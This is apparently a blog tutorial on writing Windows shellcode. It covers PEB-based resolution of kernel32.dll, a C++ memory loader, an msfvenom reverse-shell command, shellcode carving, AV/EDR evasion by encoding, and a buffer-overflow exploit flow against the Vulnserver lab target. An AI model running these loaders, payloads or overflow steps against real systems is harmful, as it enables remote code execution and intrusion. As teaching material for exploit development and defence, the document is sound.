Windows Shellcoding (In-Depth)
Published: 2025-07-15
Author: JAKESWIZ
Motivation
The primary focus of this writeup is to showcase the beauty of the Windows operating system, the science and anatomy behind it, and its overall complexity that we all take for granted.
There is an EXTREME LACK of information publicly available about Windows shellcoding. The resources that do exist overcomplicate things. This guide was created so you do not have to go through the same struggle.
What is Shellcode?
Shellcode is a small piece of position-independent machine code, usually written in Assembly and assembled into raw bytes that the CPU executes directly. It is typically injected into a process's memory and run after a software vulnerability has been exploited.
What Can Shellcode Do?
- Execute a shell on the target system (reverse or bind shell)
- Open a backdoor
- Act as a "dropper" that calls out to a malicious C2 server for further payloads
- Aid in privilege escalation
- And much more
How Shellcode is Delivered
- Memory corruption bugs
- Network-based delivery
- Local privilege escalation
- Local file-based delivery
- "Loaders"
- Physical/external delivery mechanisms
Where Does Shellcode Come From?
- Custom Assembly → "Carve" using objdump → byte string (least convenient, most stealthy)
- Generated via msfvenom or from Exploit-DB, ShellStorm, GitHub (most convenient, but signatures likely exist)
msfvenom -p windows/shell_reverse_tcp LHOST=localhost LPORT=1337 -f c
Windows vs. Linux Shellcode
| Windows | Linux |
|---|---|
| Different calling convention; direct syscalls are avoided because syscall numbers change between Windows builds | Direct syscall interface (int 0x80 or syscall) |
| Relies on WinAPI (WinExec, CreateProcessA, LoadLibrary, GetProcAddress) | |
| API functions resolved at runtime | |
| Must locate DLLs via PEB/TEB and parse export tables | |
| Naturally larger | Usually smaller |
Processes and Threads
Processes: Running instances of programs within the Windows OS. They can be started by the user or by the OS. Created via CreateProcess() → CreateProcessInternal() → NtCreateUserProcess().
Threads: A set of instructions that can be executed independently within a process. Each thread has its own Thread Local Storage (TLS) within the TEB.
The PEB & TEB
The PEB (Process Environment Block) holds userland information about a single process (binary info, loaded modules, heap info, etc.). Every process has its own PEB.
The TEB (Thread Environment Block) holds information about a single thread and contains a pointer to the PEB of the process that owns it.
Both are internal Windows data structures leveraged by malware/exploit developers. Understanding both is mandatory for Windows shellcoding.
Shellcode Navigation on Windows
- Read PEB → LDR → InMemoryOrderModuleList (linked list)
- Iterate through linked list to find kernel32.dll (always loaded)
- Parse export table to find GetProcAddress(), LoadLibraryA(), etc.
- Dynamically resolve WinAPI calls
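The list walk in the steps above can be sketched in portable C. This is only a simulation under stated assumptions: `list_entry`, `module_entry`, and `find_module_base` are hypothetical stand-ins, not the real Windows definitions, and the module name is a plain C string where the real entry stores a UNICODE_STRING. What it does show faithfully is the pattern shellcode relies on: follow the forward links of a circular list, step back from the embedded link to the start of the entry, and compare names without regard to case.

```c
#include <ctype.h>
#include <stddef.h>

/* Simplified stand-in for LIST_ENTRY (hypothetical, native pointer size). */
typedef struct list_entry {
    struct list_entry *flink;   /* next node in the circular list */
    struct list_entry *blink;   /* previous node (unused in this sketch) */
} list_entry;

/* Simplified stand-in for a loader entry; NOT the real layout. */
typedef struct module_entry {
    list_entry  in_memory_order_links; /* link node embedded in the entry */
    void       *dll_base;              /* address the module is mapped at */
    const char *base_dll_name;         /* real entries use a UNICODE_STRING */
} module_entry;

/* Case-insensitive ASCII comparison, since module names vary in case. */
int names_equal(const char *a, const char *b) {
    while (*a && *b) {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
        a++;
        b++;
    }
    return *a == *b; /* equal only if both strings ended together */
}

/* Walk the circular list that starts at head and return the base address
 * of the module called name, or NULL when the list holds no such module. */
void *find_module_base(list_entry *head, const char *name) {
    for (list_entry *node = head->flink; node != head; node = node->flink) {
        /* Step back from the embedded link to the start of the entry. */
        module_entry *entry = (module_entry *)
            ((char *)node - offsetof(module_entry, in_memory_order_links));
        if (names_equal(entry->base_dll_name, name)) return entry->dll_base;
    }
    return NULL;
}
```

Real shellcode often skips the name comparison and simply takes the third entry, which is what the two lodsd instructions later in this writeup do.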
Undocumented Structures
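Windows internals contain many undocumented or only partially documented structures, in part to protect the OS and its users. Leaving them undocumented makes life harder for reverse engineers, malware authors, and exploit developers, and it means their layouts can change between Windows versions.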
Workarounds:
- Utilize "undocumentation" sites with reverse-engineered structures
- Use debugging tools (WinDbg, x64dbg) to track data types and sizes
Anatomy of Windows Shellcode
- Assembly Code → Assembled, linked, and "carved" via objdump
- Converted to Byte String (the "bad stuff")
- Executed in Memory via a "Loader" (payloads can be encrypted/encoded to evade AV/EDR)
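As a rough illustration of the "encoded" part of the last step, here is a minimal sketch of a single-byte XOR encoder. The scheme and the name `xor_buffer` are assumptions chosen for brevity, not the method used in this writeup, and a one-byte XOR key is trivial for modern AV/EDR to undo. The point is only the shape of the idea: the payload is stored transformed and restored just before execution.

```c
#include <stddef.h>
#include <stdint.h>

/* XOR every byte of buf with key, in place.
 * XOR is its own inverse, so calling this twice with the same key
 * restores the original bytes. */
void xor_buffer(uint8_t *buf, size_t len, uint8_t key) {
    for (size_t i = 0; i < len; i++) {
        buf[i] ^= key;
    }
}
```

A loader built this way would call `xor_buffer` on the stored bytes with the same key immediately before transferring control to them.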
Simple Loader Example (C++)
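#include <Windows.h>
#include <string.h>
int main() {
    // Shellcode bytes (elided here)
    CHAR shellcode[] = "\x48\x31\xc9\x48\x81\(...)";
    // Data arrays are not executable under DEP, so copy the bytes
    // into a freshly allocated read/write/execute region first
    LPVOID exec = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) return 1;
    memcpy(exec, shellcode, sizeof(shellcode));
    // Treat the region as a function and jump into it
    int(*loader)();
    loader = (int(*)())exec;
    loader();
    return 0;
}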
Dynamic WinAPI Function Address Resolution
The same resolution logic can be reused every time you craft shellcode that needs to resolve WinAPI function addresses dynamically.
High-Level Breakdown
- Shellcode locates kernel32.dll in memory via PEB
- Uses GetProcAddress() to resolve WinExec()
- Calls WinExec("cmd.exe")
How to Always Find the PEB
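On x86, the FS segment register points at the TEB, and the TEB stores a pointer to the PEB at offset 0x30, so fs:[0x30] always yields the PEB (on x64 the equivalent is gs:[0x60]). Inside the x86 PEB, offset 0xC holds the pointer to PEB_LDR_DATA. These offsets are the same in every 32-bit process, so we can always rely on them.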
Steps to include in every Windows shellcode:
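- Dynamically resolve addresses by locating the PEB through the TEB (fs:[0x30] on x86)
- Read PEB offset 0xC (pointer to PEB_LDR_DATA, which tracks the loaded DLLs)
- Read PEB_LDR_DATA offset 0x14 (head of InMemoryOrderModuleList) and follow the list to the kernel32.dll entry, typically the third entry after the executable itself and ntdll.dll
- Each list entry stores the module's base address in DllBase at offset 0x18, but the list pointers point at the entry's InMemoryOrderLinks field at offset 0x8, not at the start of the entry
- Equation: DllBase - InMemoryOrderLinks = 0x18 - 0x8 = 0x10, so reading [entry pointer + 0x10] finds the base of kernel32.dll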
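The offset arithmetic above can be checked with a small sketch that models the 32-bit layouts as plain C structs. The `_SKETCH` type names are hypothetical, only the leading fields are included, and pointers are written as `uint32_t` so the offsets hold on any host compiler. The field order follows the commonly published reverse-engineered x86 layouts, so treat it as an illustration of the math and not as authoritative definitions.

```c
#include <stddef.h>
#include <stdint.h>

/* A 32-bit LIST_ENTRY: two 4-byte pointers. */
typedef struct { uint32_t Flink, Blink; } LIST_ENTRY32_SKETCH;

/* Leading fields of the x86 PEB, up to Ldr. */
typedef struct {
    uint8_t  InheritedAddressSpace;    /* 0x00 */
    uint8_t  ReadImageFileExecOptions; /* 0x01 */
    uint8_t  BeingDebugged;            /* 0x02 */
    uint8_t  BitField;                 /* 0x03 */
    uint32_t Mutant;                   /* 0x04 */
    uint32_t ImageBaseAddress;         /* 0x08 */
    uint32_t Ldr;                      /* 0x0C: pointer to PEB_LDR_DATA */
} PEB32_SKETCH;

/* Leading fields of the x86 PEB_LDR_DATA. */
typedef struct {
    uint32_t Length;                                  /* 0x00 */
    uint8_t  Initialized;                             /* 0x04 */
    uint8_t  Padding[3];                              /* alignment padding */
    uint32_t SsHandle;                                /* 0x08 */
    LIST_ENTRY32_SKETCH InLoadOrderModuleList;        /* 0x0C */
    LIST_ENTRY32_SKETCH InMemoryOrderModuleList;      /* 0x14 */
} PEB_LDR_DATA32_SKETCH;

/* Leading fields of the x86 LDR_DATA_TABLE_ENTRY. */
typedef struct {
    LIST_ENTRY32_SKETCH InLoadOrderLinks;             /* 0x00 */
    LIST_ENTRY32_SKETCH InMemoryOrderLinks;           /* 0x08 */
    LIST_ENTRY32_SKETCH InInitializationOrderLinks;   /* 0x10 */
    uint32_t DllBase;                                 /* 0x18 */
} LDR_ENTRY32_SKETCH;

/* Distance from the InMemoryOrderLinks pointer to DllBase: 0x18 - 0x8. */
enum {
    DLLBASE_FROM_LINK = offsetof(LDR_ENTRY32_SKETCH, DllBase)
                      - offsetof(LDR_ENTRY32_SKETCH, InMemoryOrderLinks)
};
```

`DLLBASE_FROM_LINK` is the 0x10 displacement that appears in the assembly as `mov ebx,[eax+0x10]`.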
Perspective: C vs. Assembly
C Representation (clear, easy, less control):
#include <Windows.h>
int main() {
    WinExec("cmd.exe", 0); // 0 = SW_HIDE
    return 0;
}
Assembly Representation (complex, more control):
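; Finding base address of kernel32.dll
xor ecx,ecx             ; ecx = 0
mov eax,[fs:0x30]       ; eax = PEB (pointer stored at TEB + 0x30)
mov eax,[eax+0xc]       ; eax = PEB->Ldr (PEB_LDR_DATA)
mov esi,[eax+0x14]      ; esi = InMemoryOrderModuleList.Flink (1st entry: the executable)
lodsd                   ; eax = 2nd entry (typically ntdll.dll)
xchg eax,esi            ; esi = 2nd entry
lodsd                   ; eax = 3rd entry (typically kernel32.dll)
mov ebx,[eax+0x10]      ; ebx = DllBase of kernel32.dll (0x18 - 0x8)
; Finding Export table of kernel32.dll
mov edx,[ebx+0x3c]      ; edx = e_lfanew (RVA of the PE header)
add edx,ebx             ; edx = address of the PE header
mov edx,[edx+0x78]      ; edx = RVA of the export directory
add edx,ebx             ; edx = address of the export directory
mov esi,[edx+0x20]      ; esi = RVA of AddressOfNames
add esi,ebx             ; esi = address of the names table
xor ecx,ecx             ; ecx = 0 (name index counter)
; ... (full assembly available in original writeup)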
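The assembly above stops at the names table, so here is a hedged C sketch of the lookup that usually follows: scan AddressOfNames for a match, use the same index into AddressOfNameOrdinals, and use that ordinal to index AddressOfFunctions. The helper names (`rd32`, `rd16`, `find_export_rva`) are hypothetical, the field offsets are those of IMAGE_EXPORT_DIRECTORY, and the function trusts its input completely (no bounds checks, no handling of forwarded exports), which is acceptable for a sketch but not for a parser fed untrusted files.

```c
#include <stdint.h>
#include <string.h>

/* Little-endian reads from a mapped image buffer. */
uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
uint16_t rd16(const uint8_t *p) {
    return (uint16_t)(p[0] | p[1] << 8);
}

/* Field offsets inside IMAGE_EXPORT_DIRECTORY. */
enum {
    EXP_NUMBER_OF_NAMES  = 0x18,
    EXP_ADDR_OF_FUNCS    = 0x1C,
    EXP_ADDR_OF_NAMES    = 0x20,
    EXP_ADDR_OF_ORDINALS = 0x24
};

/* Return the RVA of the export called name, or 0 if it is not found.
 * image is the module as mapped in memory; export_dir_rva is the value
 * read from the PE header at offset 0x78 in the assembly above. */
uint32_t find_export_rva(const uint8_t *image, uint32_t export_dir_rva,
                         const char *name) {
    const uint8_t *dir   = image + export_dir_rva;
    uint32_t       count = rd32(dir + EXP_NUMBER_OF_NAMES);
    const uint8_t *funcs = image + rd32(dir + EXP_ADDR_OF_FUNCS);
    const uint8_t *names = image + rd32(dir + EXP_ADDR_OF_NAMES);
    const uint8_t *ords  = image + rd32(dir + EXP_ADDR_OF_ORDINALS);

    for (uint32_t i = 0; i < count; i++) {
        /* Each names entry is an RVA to a NUL-terminated ASCII string. */
        const char *candidate = (const char *)(image + rd32(names + 4 * i));
        if (strcmp(candidate, name) == 0) {
            /* The name index selects an ordinal, which selects the function. */
            uint16_t ordinal = rd16(ords + 2 * i);
            return rd32(funcs + 4 * ordinal);
        }
    }
    return 0;
}
```

Adding the returned RVA to the module base gives the callable address, which is the value the shellcode would keep for GetProcAddress() or WinExec().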
Why MessageBoxA() is a Solid Beginner Payload
- Simple API call with only four arguments (owner window, message, title, style)
- Confirms successful code execution visually
- Requires no complex setup or external communication
- Avoids overhead of spawning processes or handling strings externally
- Virtually no dependencies (part of user32.dll, loaded in almost any GUI application)
Building Your First Shellcode
Generate with msfvenom
msfvenom -p windows/messagebox TEXT="HELLO WORLD" TITLE="MESSAGEBOX" -f c
Compile Custom Assembly
nasm -f win32 MessageBoxA.s -o MessageBoxA.o
ld -m i386pe -o MessageBoxA-ASM.exe MessageBoxA.o
"Carve" Shellcode with objdump
objdump -d ./MessageBoxA.o | grep -e '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'
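The end product of the pipeline above is a quoted string of \x escapes. If the raw bytes are already in a buffer, the same formatting can be sketched in C. The function name `format_shellcode` and its signature are assumptions made for this example; it is not a replacement for objdump, only a way to see what the carved output looks like byte by byte.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Write bytes as a quoted "\xNN\xNN..." literal into out.
 * Returns the number of characters written (excluding the NUL),
 * or 0 if out_size is too small to hold the result. */
size_t format_shellcode(const uint8_t *bytes, size_t len,
                        char *out, size_t out_size) {
    size_t needed = len * 4 + 3; /* 4 chars per byte, 2 quotes, 1 NUL */
    if (out_size < needed) return 0;

    char *p = out;
    *p++ = '"';
    for (size_t i = 0; i < len; i++) {
        snprintf(p, 5, "\\x%02x", bytes[i]); /* emits \xNN plus a NUL */
        p += 4;                              /* next write overwrites the NUL */
    }
    *p++ = '"';
    *p = '\0';
    return (size_t)(p - out);
}
```

For the three bytes 0x31, 0xc9, 0x90 this produces the 14-character string "\x31\xc9\x90", quotes included.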
Common Pitfalls
Compatibility Issues (x86/x64)
- x86 target → x86 shellcode
- x64 target → x64 shellcode
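- Different registers and calling conventions (stdcall on x86 passes arguments on the stack; the x64 convention, a fastcall variant, passes the first four in RCX, RDX, R8, and R9)
- Different pointer and data sizes shift structure offsets and can lead to stack misalignment (x64 expects 16-byte alignment at call sites)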
Null Bytes (\x00) and Bad Characters
- Null bytes act as string terminators in C environments, truncating shellcode
- Bad characters cause corruption, filtering, or encoding issues
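Checking for bad characters is easy to automate before a payload is ever sent. The sketch below scans a buffer for the first byte that appears in a caller-supplied bad-character list. The name `find_bad_char` is hypothetical, and which bytes count as "bad" depends entirely on the target, so the list has to come from testing that target.

```c
#include <stddef.h>
#include <stdint.h>

/* Return the index of the first byte in code that also appears in bad,
 * or -1 if the shellcode contains none of the bad characters. */
long find_bad_char(const uint8_t *code, size_t code_len,
                   const uint8_t *bad, size_t bad_len) {
    for (size_t i = 0; i < code_len; i++) {
        for (size_t j = 0; j < bad_len; j++) {
            if (code[i] == bad[j]) return (long)i;
        }
    }
    return -1;
}
```

A typical call passes at least 0x00 in the bad list; a result other than -1 points at the instruction that needs to be rewritten or encoded.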
NOP Sleds
A "landing pad" for your CPU:
- Increases exploit reliability (especially in buffer overflows)
- Creates a safe "landing zone" for shellcode
- "Pads" memory and "absorbs" imprecision
- Can indirectly increase payload size without impacting logic
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
Real-World Application: Exploiting Vulnserver
Target: Vulnserver (TRUN command buffer overflow)
Vulnerable code:
void Function3(char *Input) {
char Buffer2S[2000];
strcpy(Buffer2S, Input); // No bounds check!
}
Trigger condition:
if (strncmp(RecvBuf, "TRUN ", 5) == 0) {
    // i walks over the bytes that follow "TRUN " (loop elided here)
    if ((char)RecvBuf[i] == '.') {
        Function3(TrunBuf);
    }
}
Exploit flow:
1. Send TRUN . + payload longer than 2000 bytes
2. Overflow the buffer and overwrite the saved return address so that EIP is loaded with the address of a JMP ESP instruction
3. Execute NOP sled + shellcode
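The exploit flow above maps onto a simple buffer layout: command prefix, filler up to the saved return address, the JMP ESP address in little-endian order, a NOP sled, then the shellcode. Below is a minimal sketch of assembling that buffer. `build_trun_payload` and all of its parameters are hypothetical: the filler length and the JMP ESP address are not given in this writeup and must be found against the actual target (for example with a cyclic pattern and a debugger), so they are left as inputs instead of hardcoded.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Lay out: "TRUN ." | filler 'A' x eip_offset | return address |
 *          NOP sled | shellcode.
 * eip_offset counts the filler bytes after the prefix (assumed to be
 * measured by the caller). Returns the total length, or 0 if out is
 * too small. */
size_t build_trun_payload(uint8_t *out, size_t out_size,
                          size_t eip_offset, uint32_t jmp_esp_addr,
                          size_t sled_len,
                          const uint8_t *shellcode, size_t shellcode_len) {
    static const char prefix[] = "TRUN .";
    size_t prefix_len = sizeof prefix - 1; /* drop the trailing NUL */
    size_t total = prefix_len + eip_offset + 4 + sled_len + shellcode_len;
    if (out_size < total) return 0;

    uint8_t *p = out;
    memcpy(p, prefix, prefix_len);
    p += prefix_len;
    memset(p, 'A', eip_offset);            /* filler up to the return address */
    p += eip_offset;
    for (int i = 0; i < 4; i++) {          /* x86 stores addresses little-endian */
        *p++ = (uint8_t)(jmp_esp_addr >> (8 * i));
    }
    memset(p, 0x90, sled_len);             /* NOP sled */
    p += sled_len;
    memcpy(p, shellcode, shellcode_len);   /* payload lands after the sled */
    return total;
}
```

The resulting bytes would then be sent over a TCP socket to the Vulnserver port. The return address itself must not contain bad characters, since it travels through the same strcpy as the rest of the payload.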
⛧ Now go break things (ethically) ⛧